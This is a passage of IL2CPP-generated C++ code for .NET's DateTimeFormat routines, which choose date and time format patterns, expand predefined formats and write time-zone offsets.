TimeSpan_Negate_m0DC5231DD5489EB3A8A7AE9AC30F83CBD3987C33((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&___offset1), /*hidden argument*/NULL); ___offset1 = L_21; } IL_008c: { int32_t L_22 = ___tokenLen3; if ((((int32_t)L_22) > ((int32_t)1))) { goto IL_00af; } } { StringBuilder_t * L_23 = ___result5; IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_24 = CultureInfo_get_InvariantCulture_mF13B47F8A763CE6A9C8A8BB2EED33FF8F7A63A72(/*hidden argument*/NULL); int32_t L_25 = TimeSpan_get_Hours_mE248B39F7E3E07DAD257713114E86A1A2C191A45((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&___offset1), /*hidden argument*/NULL); int32_t L_26 = L_25; RuntimeObject * L_27 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_26); StringBuilder_AppendFormat_m0097821BD0E9086D37BEE314239983EBD980B636(L_23, L_24, _stringLiteralBDEF35423BEEA3F7C34BDC3E75748DEA59050198, L_27, /*hidden argument*/NULL); return; } IL_00af: { StringBuilder_t * L_28 = ___result5; IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_29 = CultureInfo_get_InvariantCulture_mF13B47F8A763CE6A9C8A8BB2EED33FF8F7A63A72(/*hidden argument*/NULL); int32_t L_30 = TimeSpan_get_Hours_mE248B39F7E3E07DAD257713114E86A1A2C191A45((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&___offset1), /*hidden argument*/NULL); int32_t L_31 = L_30; RuntimeObject * L_32 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_31); StringBuilder_AppendFormat_m0097821BD0E9086D37BEE314239983EBD980B636(L_28, L_29, _stringLiteral250E34D0324F6809D28A6BCC386CC09FE5DB991C, L_32, /*hidden argument*/NULL); int32_t L_33 = ___tokenLen3; if ((((int32_t)L_33) < ((int32_t)3))) { goto IL_00ef; } } { StringBuilder_t * L_34 = ___result5; IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_35 = CultureInfo_get_InvariantCulture_mF13B47F8A763CE6A9C8A8BB2EED33FF8F7A63A72(/*hidden argument*/NULL); int32_t L_36 = TimeSpan_get_Minutes_mCABF9EE7E7F78368DA0F825F5922C06238DD0F22((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&___offset1), /*hidden argument*/NULL); int32_t L_37 = L_36; RuntimeObject * L_38 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_37); StringBuilder_AppendFormat_m0097821BD0E9086D37BEE314239983EBD980B636(L_34, L_35, _stringLiteral2E7074DA7ECD9C7BACE7E75734DE6D1D00895DFE, L_38, /*hidden argument*/NULL); } IL_00ef: { return; } } // System.Void System.DateTimeFormat::FormatCustomizedRoundripTimeZone(System.DateTime,System.TimeSpan,System.Text.StringBuilder) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_FormatCustomizedRoundripTimeZone_mDCF0536EFD8B9E6DD2E794237D72D9C939099AC7 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___offset1, StringBuilder_t * ___result2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat_FormatCustomizedRoundripTimeZone_mDCF0536EFD8B9E6DD2E794237D72D9C939099AC7_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_0 = ___offset1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_1 = ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->get_NullOffset_0(); IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); bool L_2 = TimeSpan_op_Equality_mEA0A4B7FDCAFA54C636292F7EB76F9A16C44096D(L_0, L_1, /*hidden argument*/NULL); if (!L_2) { goto IL_0036; } } { int32_t L_3 = DateTime_get_Kind_m44C21F0AB366194E0233E48B77B15EBB418892BE((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); V_0 = L_3; int32_t L_4 = V_0; if ((((int32_t)L_4) == ((int32_t)1))) { goto IL_0028; } } { int32_t L_5 = V_0; if ((!(((uint32_t)L_5) == ((uint32_t)2)))) { goto IL_0035; } } { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_6 = ___dateTime0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_7 = TimeZoneInfo_GetLocalUtcOffset_m1C5E0CC7CA725508F5180BDBF2D03C3E8DF0FBFC(L_6, 2, /*hidden argument*/NULL); ___offset1 = L_7; goto IL_0036; } IL_0028: { StringBuilder_t * L_8 = ___result2; StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_8, _stringLiteral909F99A779ADB66A76FC53AB56C7DD1CAF35D0FD, /*hidden argument*/NULL); return; } IL_0035: { return; } IL_0036: { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_9 = ___offset1; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_10 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); bool L_11 = TimeSpan_op_GreaterThanOrEqual_m7FE9830EF2AAD2BB65628A0FE7F7C70161BB4D9B(L_9, L_10, /*hidden argument*/NULL); if (!L_11) { goto IL_004e; } } { StringBuilder_t * L_12 = ___result2; StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_12, ((int32_t)43), /*hidden argument*/NULL); goto IL_0060; } IL_004e: { StringBuilder_t * L_13 = ___result2; StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_13, ((int32_t)45), /*hidden argument*/NULL); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_14 = TimeSpan_Negate_m0DC5231DD5489EB3A8A7AE9AC30F83CBD3987C33((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&___offset1), /*hidden argument*/NULL); ___offset1 = L_14; } IL_0060: { StringBuilder_t * L_15 = ___result2; IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_16 = CultureInfo_get_InvariantCulture_mF13B47F8A763CE6A9C8A8BB2EED33FF8F7A63A72(/*hidden argument*/NULL); int32_t L_17 = TimeSpan_get_Hours_mE248B39F7E3E07DAD257713114E86A1A2C191A45((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&___offset1), /*hidden argument*/NULL); int32_t L_18 = L_17; RuntimeObject * L_19 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_18); int32_t L_20 = TimeSpan_get_Minutes_mCABF9EE7E7F78368DA0F825F5922C06238DD0F22((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)(&___offset1), /*hidden argument*/NULL); int32_t L_21 = L_20; RuntimeObject * L_22 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_21); StringBuilder_AppendFormat_m6253057BEFDE3B0EDC63B8C725CD573486720D4C(L_15, L_16, _stringLiteral69C6FA8468D332A8338354A74CE92AA8DA8A642A, L_19, L_22, /*hidden argument*/NULL); return; } } // System.String System.DateTimeFormat::GetRealFormat(System.String,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_GetRealFormat_mAAA9091BEC0C4473B1D7377152247CEFD2BC4ED0 (String_t* ___format0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat_GetRealFormat_mAAA9091BEC0C4473B1D7377152247CEFD2BC4ED0_MetadataUsageId); s_Il2CppMethodInitialized = true; } String_t* V_0 = NULL; Il2CppChar V_1 = 0x0; { V_0 = (String_t*)NULL; String_t* L_0 = ___format0; Il2CppChar L_1 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_0, 0, /*hidden argument*/NULL); V_1 = L_1; Il2CppChar L_2 = V_1; if ((!(((uint32_t)L_2) <= ((uint32_t)((int32_t)85))))) { goto IL_005a; } } { Il2CppChar L_3 = V_1; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_3, (int32_t)((int32_t)68)))) { case 0: { goto IL_00c9; } case 1: { goto IL_0159; } case 2: { goto IL_00ee; } case 3: { goto IL_0100; } } } { Il2CppChar L_4 = V_1; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_4, (int32_t)((int32_t)77)))) { case 0: { goto IL_0109; } case 1: { goto IL_0159; } case 2: { goto IL_0112; } case 3: { goto IL_0159; } case 4: { goto IL_0159; } case 5: { goto IL_011a; } case 6: { goto IL_0159; } case 7: { goto IL_0135; } case 8: { goto IL_0147; } } } { goto IL_0159; } IL_005a: { Il2CppChar L_5 = V_1; if ((((int32_t)L_5) == ((int32_t)((int32_t)89)))) { goto IL_0150; } } { Il2CppChar L_6 = V_1; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_6, (int32_t)((int32_t)100)))) { case 0: { goto IL_00bd; } case 1: { goto IL_0159; } case 2: { goto IL_00d5; } case 3: { goto IL_00f7; } } } { Il2CppChar L_7 = V_1; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_7, (int32_t)((int32_t)109)))) { case 0: { goto IL_0109; } case 1: { goto IL_0159; } case 2: { goto IL_0112; } case 3: { goto IL_0159; } case 4: { goto IL_0159; } case 5: { goto IL_011a; } case 6: { goto IL_0123; } case 7: { goto IL_012c; } case 8: { goto IL_013e; } case 9: { goto IL_0159; } case 10: { goto IL_0159; } case 11: { goto IL_0159; } case 12: { goto IL_0150; } } } { goto IL_0159; } IL_00bd: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_8 = ___dtfi1; String_t* L_9 = DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA(L_8, /*hidden argument*/NULL); V_0 = L_9; goto IL_0169; } IL_00c9: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_10 = ___dtfi1; String_t* L_11 = DateTimeFormatInfo_get_LongDatePattern_mB46C198F0A2ED40F705A73B83BF17592B1899FAB(L_10, /*hidden argument*/NULL); V_0 = L_11; goto IL_0169; } IL_00d5: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_12 = ___dtfi1; String_t* L_13 = DateTimeFormatInfo_get_LongDatePattern_mB46C198F0A2ED40F705A73B83BF17592B1899FAB(L_12, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_14 = ___dtfi1; String_t* L_15 = DateTimeFormatInfo_get_ShortTimePattern_m2E9988522765F996BFB93BF34EA7673A3A484417(L_14, /*hidden argument*/NULL); String_t* L_16 = String_Concat_mF4626905368D6558695A823466A1AF65EADB9923(L_13, _stringLiteralB858CB282617FB0956D960215C8E84D1CCF909C6, L_15, /*hidden argument*/NULL); V_0 = L_16; goto IL_0169; } IL_00ee: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_17 = ___dtfi1; String_t* L_18 = DateTimeFormatInfo_get_FullDateTimePattern_mC8709BFB52E481105D6B4150293C2FBC0FEAA5B4(L_17, /*hidden argument*/NULL); V_0 = L_18; goto IL_0169; } IL_00f7: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_19 = ___dtfi1; String_t* L_20 = DateTimeFormatInfo_get_GeneralShortTimePattern_m6528409AA7B4B138D136F9F5C6C2CA16981EBAB8(L_19, /*hidden argument*/NULL); V_0 = L_20; goto IL_0169; } IL_0100: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_21 = ___dtfi1; String_t* L_22 = DateTimeFormatInfo_get_GeneralLongTimePattern_m4803CD35334AA775089F6E48DF03817B6068E130(L_21, /*hidden argument*/NULL); V_0 = L_22; goto IL_0169; } IL_0109: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_23 = ___dtfi1; String_t* L_24 = DateTimeFormatInfo_get_MonthDayPattern_mDDF41CCC5BBC4BA915AFAA0F973FCD5B2515B0F3(L_23, /*hidden argument*/NULL); V_0 = L_24; goto IL_0169; } IL_0112: { V_0 = _stringLiteralD7F5BC0BFDF8E081DB31E631E37B15C3881B1317; goto IL_0169; } IL_011a: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_25 = ___dtfi1; String_t* L_26 = DateTimeFormatInfo_get_RFC1123Pattern_m8216E79C7C862A9AE400D52FCF07EA0B0C9AD49E(L_25, /*hidden argument*/NULL); V_0 = L_26; goto IL_0169; } IL_0123: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_27 = ___dtfi1; String_t* L_28 = DateTimeFormatInfo_get_SortableDateTimePattern_mF3A3FA3102096383E0E18C01F7F7A5F50375EF1B(L_27, /*hidden argument*/NULL); V_0 = L_28; goto IL_0169; } IL_012c: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_29 = ___dtfi1; String_t* L_30 = DateTimeFormatInfo_get_ShortTimePattern_m2E9988522765F996BFB93BF34EA7673A3A484417(L_29, /*hidden argument*/NULL); V_0 = L_30; goto IL_0169; } IL_0135: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_31 = ___dtfi1; String_t* L_32 = DateTimeFormatInfo_get_LongTimePattern_m5304AFC0442E7F208D4D39392E3CE8C0B56F5266(L_31, /*hidden argument*/NULL); V_0 = L_32; goto IL_0169; } IL_013e: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_33 = ___dtfi1; String_t* L_34 = DateTimeFormatInfo_get_UniversalSortableDateTimePattern_m2322E2915D3E6EB5A61DDCA1F6F9CC07C61D4141(L_33, /*hidden argument*/NULL); V_0 = L_34; goto IL_0169; } IL_0147: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_35 = ___dtfi1; String_t* L_36 = DateTimeFormatInfo_get_FullDateTimePattern_mC8709BFB52E481105D6B4150293C2FBC0FEAA5B4(L_35, /*hidden argument*/NULL); V_0 = L_36; goto IL_0169; } IL_0150: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_37 = ___dtfi1; String_t* L_38 = DateTimeFormatInfo_get_YearMonthPattern_m58DC71FC083C4CBF5C2856140BEE5EC705AA5034(L_37, /*hidden argument*/NULL); V_0 = L_38; goto IL_0169; } IL_0159: { String_t* L_39 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralD2F0257C42607F2773F4B8AAB0C017A3B8949322, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_40 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_40, L_39, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_40, NULL, DateTimeFormat_GetRealFormat_mAAA9091BEC0C4473B1D7377152247CEFD2BC4ED0_RuntimeMethod_var); } IL_0169: { String_t* L_41 = V_0; return L_41; } } // System.String System.DateTimeFormat::ExpandPredefinedFormat(System.String,System.DateTime&,System.Globalization.DateTimeFormatInfo&,System.TimeSpan&) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_ExpandPredefinedFormat_m61BDA6D452DFDB96A8CB7369474886DE29C5395A (String_t* ___format0, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * ___dateTime1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** ___dtfi2, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * ___offset3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat_ExpandPredefinedFormat_m61BDA6D452DFDB96A8CB7369474886DE29C5395A_MetadataUsageId); s_Il2CppMethodInitialized = true; } Il2CppChar V_0 = 0x0; { String_t* L_0 = ___format0; Il2CppChar L_1 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_0, 0, /*hidden argument*/NULL); V_0 = L_1; Il2CppChar L_2 = V_0; if ((!(((uint32_t)L_2) <= ((uint32_t)((int32_t)82))))) { goto IL_001c; } } { Il2CppChar L_3 = V_0; if ((((int32_t)L_3) == ((int32_t)((int32_t)79)))) { goto IL_004e; } } { Il2CppChar L_4 = V_0; if ((((int32_t)L_4) == ((int32_t)((int32_t)82)))) { goto IL_005a; } } { goto IL_0160; } IL_001c: { Il2CppChar L_5 = V_0; if ((((int32_t)L_5) == ((int32_t)((int32_t)85)))) { goto IL_00fb; } } { Il2CppChar L_6 = V_0; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_6, (int32_t)((int32_t)111)))) { case 0: { goto IL_004e; } case 1: { goto IL_0160; } case 2: { goto IL_0160; } case 3: { goto IL_005a; } case 4: { goto IL_00a6; } case 5: { goto IL_0160; } case 6: { goto IL_00b2; } } } { goto IL_0160; } IL_004e: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_7 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_8 = DateTimeFormatInfo_get_InvariantInfo_mF4896D7991425B6C5391BB86C11091A8B715CCDC(/*hidden argument*/NULL); *((RuntimeObject **)L_7) = (RuntimeObject *)L_8; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_7, (RuntimeObject *)L_8); goto IL_0160; } IL_005a: { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_9 = ___offset3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_10 = ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->get_NullOffset_0(); IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); bool L_11 = TimeSpan_op_Inequality_mEAE207F8B9A9B42CC33F4DE882E69E98C09065FC((*(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_9), L_10, /*hidden argument*/NULL); if (!L_11) { goto IL_0085; } } { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_12 = ___dateTime1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_13 = ___dateTime1; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_14 = ___offset3; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_15 = DateTime_op_Subtraction_m679BBE02927C8538BBDD10A514E655568246830B((*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_13), (*(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_14), /*hidden argument*/NULL); *(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_12 = L_15; goto IL_009a; } IL_0085: { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_16 = ___dateTime1; int32_t L_17 = DateTime_get_Kind_m44C21F0AB366194E0233E48B77B15EBB418892BE((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_16, /*hidden argument*/NULL); if ((!(((uint32_t)L_17) == ((uint32_t)2)))) { goto IL_009a; } } { String_t* L_18 = ___format0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_19 = ___dateTime1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_InvalidFormatForLocal_m9049D2389DBF1FCAD1AF3E98F2B462E17104053B(L_18, (*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_19), /*hidden argument*/NULL); } IL_009a: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_20 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_21 = DateTimeFormatInfo_get_InvariantInfo_mF4896D7991425B6C5391BB86C11091A8B715CCDC(/*hidden argument*/NULL); *((RuntimeObject **)L_20) = (RuntimeObject *)L_21; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_20, (RuntimeObject *)L_21); goto IL_0160; } IL_00a6: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_22 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_23 = DateTimeFormatInfo_get_InvariantInfo_mF4896D7991425B6C5391BB86C11091A8B715CCDC(/*hidden argument*/NULL); *((RuntimeObject **)L_22) = (RuntimeObject *)L_23; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_22, (RuntimeObject *)L_23); goto IL_0160; } IL_00b2: { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_24 = ___offset3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_25 = ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->get_NullOffset_0(); IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); bool L_26 = TimeSpan_op_Inequality_mEAE207F8B9A9B42CC33F4DE882E69E98C09065FC((*(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_24), L_25, /*hidden argument*/NULL); if (!L_26) { goto IL_00dd; } } { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_27 = ___dateTime1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_28 = ___dateTime1; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_29 = ___offset3; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_30 = DateTime_op_Subtraction_m679BBE02927C8538BBDD10A514E655568246830B((*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_28), (*(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_29), /*hidden argument*/NULL); *(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_27 = L_30; goto IL_00f2; } IL_00dd: { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_31 = ___dateTime1; int32_t L_32 = DateTime_get_Kind_m44C21F0AB366194E0233E48B77B15EBB418892BE((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_31, /*hidden argument*/NULL); if ((!(((uint32_t)L_32) == ((uint32_t)2)))) { goto IL_00f2; } } { String_t* L_33 = ___format0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_34 = ___dateTime1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_InvalidFormatForLocal_m9049D2389DBF1FCAD1AF3E98F2B462E17104053B(L_33, (*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_34), /*hidden argument*/NULL); } IL_00f2: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_35 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_36 = DateTimeFormatInfo_get_InvariantInfo_mF4896D7991425B6C5391BB86C11091A8B715CCDC(/*hidden argument*/NULL); *((RuntimeObject **)L_35) = (RuntimeObject *)L_36; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_35, (RuntimeObject *)L_36); goto IL_0160; } IL_00fb: { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_37 = ___offset3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_38 = ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->get_NullOffset_0(); IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); bool L_39 = TimeSpan_op_Inequality_mEAE207F8B9A9B42CC33F4DE882E69E98C09065FC((*(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_37), L_38, /*hidden argument*/NULL); if (!L_39) { goto IL_011d; } } { String_t* L_40 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralD2F0257C42607F2773F4B8AAB0C017A3B8949322, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_41 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_41, L_40, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_41, NULL, DateTimeFormat_ExpandPredefinedFormat_m61BDA6D452DFDB96A8CB7369474886DE29C5395A_RuntimeMethod_var); } IL_011d: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** 